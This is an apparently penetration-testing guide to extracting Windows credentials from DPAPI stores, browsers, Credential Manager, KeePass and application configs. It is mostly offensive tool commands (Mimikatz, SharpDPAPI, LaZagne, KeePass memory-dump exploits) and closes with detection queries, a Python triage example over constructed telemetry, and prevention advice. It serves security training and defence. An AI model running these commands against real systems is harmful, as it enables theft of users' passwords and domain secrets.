Credential Harvesting
Beyond LSASS dumping, Windows stores credentials in numerous locations: DPAPI-protected blobs, browser password stores, Windows Credential Manager, password managers, and application config files. This guide covers systematic extraction of credentials from all major stores with modern tooling.
DPAPI Fundamentals
The Data Protection API (DPAPI) is Windows' built-in encryption framework, used by browsers, Credential Manager, RDP passwords, Wi-Fi keys, and countless applications. Each user has master keys, encrypted with a key derived from their logon password and stored in %APPDATA%\Microsoft\Protect\{SID}\. The domain also maintains a backup key for recovery.
DPAPI Key Extraction
```
# SharpDPAPI - comprehensive DPAPI triage (run as target user or SYSTEM)
SharpDPAPI.exe triage
# Dump all DPAPI master keys (requires SYSTEM)
SharpDPAPI.exe masterkeys /rpc
# Decrypt all DPAPI blobs with recovered master keys
SharpDPAPI.exe credentials /mkfile:masterkeys.txt
SharpDPAPI.exe vaults /mkfile:masterkeys.txt
# Mimikatz - DPAPI module
sekurlsa::dpapi                                 # Extract DPAPI keys from memory
dpapi::masterkey /in:"path\to\masterkey" /rpc   # Decrypt with DC
dpapi::cred /in:"path\to\credential_blob" /masterkey:<key>
# Impacket (remote)
dpapi.py unprotect -file credential.blob -key <masterkey>
```
Domain DPAPI Backup Key
The DC stores a DPAPI backup key that can decrypt any user's master keys; extracting it requires Domain Admin rights.
```
# Mimikatz
lsadump::backupkeys /system:dc01.corp.local /export
# Impacket
dpapi.py backupkeys -t dc01.corp.local 'corp.local/admin:Password1'
# With the domain backup key, decrypt any user's master keys:
dpapi.py masterkey -file user_masterkey -pvk domain_backupkey.pvk
# Then decrypt their credentials, browser passwords, etc.
SharpDPAPI.exe /pvk:domain_backupkey.pvk credentials
```
Browser Credential Extraction
Chrome / Edge (Chromium-Based)
Chromium browsers store passwords in a SQLite database (Login Data) encrypted with DPAPI.
Chrome: %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data
Edge: %LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Login Data
```
# SharpChromium - extract Chrome/Edge passwords, cookies, history
SharpChromium.exe logins
SharpChromium.exe cookies
SharpChromium.exe history
# SharpDPAPI - browser triage
SharpDPAPI.exe chromium /browser:chrome
SharpDPAPI.exe chromium /browser:edge
# From Linux with the user's master key
python3 chrome_decrypt.py --browser chrome --masterkey <key>
# HackBrowserData - multi-browser extraction
hack-browser-data.exe -b chrome,edge,firefox
# Seatbelt - enumerate saved browser credentials
Seatbelt.exe -group=user -outputfile=seatbelt.json
```
Firefox
Firefox uses NSS rather than DPAPI. Passwords are stored in logins.json; the key that decrypts them is in key4.db, protected by the master password (blank unless the user set one).
```
# firepwd.py - decrypt Firefox passwords
python3 firepwd.py -d "%APPDATA%\Mozilla\Firefox\Profiles\abc123.default"
# SharpWeb - extract from multiple browsers
SharpWeb.exe all
# If a master password is set, it must be cracked first
# Extract key4.db and use firefox2hashcat
python3 firefox2hashcat.py key4.db > ff_hash.txt
hashcat -m 26100 ff_hash.txt wordlist.txt
```
Windows Credential Manager
Credential Manager stores saved credentials for websites, network shares, RDP connections, and applications. Credentials are in %APPDATA%\Microsoft\Credentials\ and protected by DPAPI.
```
# List saved credentials (as the user)
cmdkey /list
# SharpDPAPI - decrypt Credential Manager entries
SharpDPAPI.exe credentials
SharpDPAPI.exe vaults
# Mimikatz - vault enumeration and decryption
vault::list
vault::cred /patch
# Decrypt specific credential files
dpapi::cred /in:"%APPDATA%\Microsoft\Credentials\<GUID>" /masterkey:<key>
# Seatbelt - enumerate
Seatbelt.exe CredFiles WindowsCredentialFiles WindowsVault
# LaZagne - automated multi-source credential extraction
lazagne.exe all
# NetExec - remote credential extraction (requires admin)
nxc smb target -u admin -p 'Password1' -M dpapi
```
KeePass Extraction
KeePass databases (.kdbx) are encrypted with a master password. Several attack vectors exist.
```
# CVE-2023-32784 - KeePass < 2.54 memory dump (extracts master password)
KeePassDumpMasterKey.exe
python3 keepass-dump-masterkey.py kdmp.dmp   # from a process dump
# KeeThief - extract master key from running KeePass process
KeeThief.exe
# KeeFarce - DLL injection to export all passwords to CSV
KeeFarce.exe
# Offline cracking if you have the .kdbx file
keepass2john database.kdbx > keepass_hash.txt
hashcat -m 13400 keepass_hash.txt wordlist.txt
john --format=KeePass keepass_hash.txt --wordlist=wordlist.txt
# Search for kdbx files on network shares
dir \\fileserver\share\ /s /b | findstr /i "\.kdbx$"
nxc smb targets.txt -u user -p Pass123 --spider . --regex "\.kdbx$"
```
Other Application Credentials
| Source | Location / Notes |
|---|---|
| Wi-Fi | DPAPI-protected wireless profiles |
| PuTTY/WinSCP | Registry or ini file saved sessions |
| mRemoteNG | confCons.xml (default or custom key) |
| Sticky Notes | plum.sqlite in MicrosoftStickyNotes package |
| PSReadline | PowerShell history may contain plaintext passwords |
| IIS AppPools | applicationHost.config passwords |
| Unattend.xml | Deployment passwords in Panther directory |
```
# Wi-Fi passwords
netsh wlan show profiles
netsh wlan show profile name="WiFiName" key=clear
dpapi::wifi
# PuTTY saved sessions
reg query "HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions" /s
# mRemoteNG
python3 mremoteng_decrypt.py confCons.xml
# PowerShell history
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
# IIS Application Pool passwords
C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*
# Unattend.xml
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\unattend\Unattend.xml
# LaZagne - all-in-one extraction
lazagne.exe all -oJ -output results.json
```
Detection & Blue Team
| Source | Detection |
|---|---|
| Sysmon Event 1 | Known credential harvesting tools (SharpDPAPI, LaZagne, SharpChromium) |
| Sysmon Event 11 | File access to Login Data, Cookies, key4.db, or DPAPI master key paths |
| Event 4662 | DPAPI backup key access on DC (ms-BKRP-BackupKey GUID) |
| EDR | Process accessing browser credential files, SQLite operations on Login Data |
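The table above and the KQL in this section look for processes other than the owning browser touching credential-store files, reads of the per-user DPAPI master key folder, and 4662 audits that reference the backup key. Below is that logic run over a few constructed telemetry records, as an added Python example that is not part of the original guide; field names mirror the DeviceFileEvents/SecurityEvent columns, and every path, user, GUID and process name is a constructed sample. It goes slightly beyond the KQL by mapping each store file to its owning browser, so a Chromium process reading key4.db is flagged too.

```python
import re
# Each credential store and the only processes that legitimately open it.
# Field names mirror the DeviceFileEvents / SecurityEvent columns used in the
# KQL in this section; every record below is constructed sample telemetry.
STORE_OWNER = {
    "Login Data": {"chrome.exe", "msedge.exe"},
    "Cookies": {"chrome.exe", "msedge.exe"},
    "key4.db": {"firefox.exe"},
    "logins.json": {"firefox.exe"},
}
# Per-user master keys live under ...\Microsoft\Protect\<SID>\; only lsass.exe
# is expected to read them during normal operation.
MASTERKEY_DIR = re.compile(r"\\Microsoft\\Protect\\S-1-5-21-[\d-]+", re.I)

def classify_file_event(evt):
    """Return a finding for a suspicious file event, or None if it looks benign."""
    proc = evt["InitiatingProcessFileName"].lower()
    name = evt["FileName"]
    if name in STORE_OWNER and proc not in STORE_OWNER[name]:
        return f"browser store '{name}' opened by {proc}"
    if MASTERKEY_DIR.search(evt["FolderPath"]) and proc != "lsass.exe":
        return f"DPAPI master key directory read by {proc}"
    return None

def classify_security_event(evt):
    """Flag 4662 audits whose Properties reference the DPAPI backup key object."""
    if evt["EventID"] == 4662 and "BCKUPKEY" in evt["Properties"].upper():
        return f"DPAPI backup key retrieval by {evt['SubjectUserName']}"
    return None

def triage(file_events, security_events):
    """Run both classifiers and return every finding, in input order."""
    hits = [f for e in file_events if (f := classify_file_event(e))]
    return hits + [f for e in security_events if (f := classify_security_event(e))]

CHROME = r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default"
FILE_EVENTS = [  # constructed: one benign open, then three harvester-style reads
    {"FileName": "Login Data", "FolderPath": CHROME, "InitiatingProcessFileName": "chrome.exe"},
    {"FileName": "Login Data", "FolderPath": CHROME, "InitiatingProcessFileName": "powershell.exe"},
    {"FileName": "key4.db", "FolderPath": r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\p.default",
     "InitiatingProcessFileName": "chrome.exe"},  # wrong browser for this store
    {"FileName": "7a1b2c3d-0000-4000-8000-000000000001",  # constructed master key GUID
     "FolderPath": r"C:\Users\alice\AppData\Roaming\Microsoft\Protect\S-1-5-21-111-222-333-1001",
     "InitiatingProcessFileName": "rundll32.exe"},
]
SECURITY_EVENTS = [  # constructed 4662 audits as a domain controller would log them
    {"EventID": 4662, "SubjectUserName": "svc_backup", "Properties": "... BCKUPKEY_P ..."},
    {"EventID": 4662, "SubjectUserName": "alice", "Properties": "... CN=Users ..."},
]
FINDINGS = triage(FILE_EVENTS, SECURITY_EVENTS)  # four alerts for the sample above
```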
```
// KQL - Detect DPAPI backup key retrieval from DC
SecurityEvent
| where EventID == 4662
| where Properties contains "BCKUPKEY"
| project TimeGenerated, SubjectUserName, ObjectName, IpAddress
// Detect browser credential file access
DeviceFileEvents
| where FileName in ("Login Data", "Cookies", "key4.db", "logins.json")
| where InitiatingProcessFileName !in ("chrome.exe","msedge.exe","firefox.exe")
| project Timestamp, DeviceName, InitiatingProcessFileName, FileName, FolderPath
```
Prevention
Enterprise Password Managers
Use enterprise password managers with MFA instead of browser saved passwords or Credential Manager.
Credential Guard
Enable Windows Credential Guard to isolate DPAPI operations in a secure enclave.
Browser Policy
Disable browser password saving via GPO and redirect to enterprise password manager extensions.
Update KeePass
Ensure KeePass is updated to 2.54+ to patch CVE-2023-32784 (memory master password leak).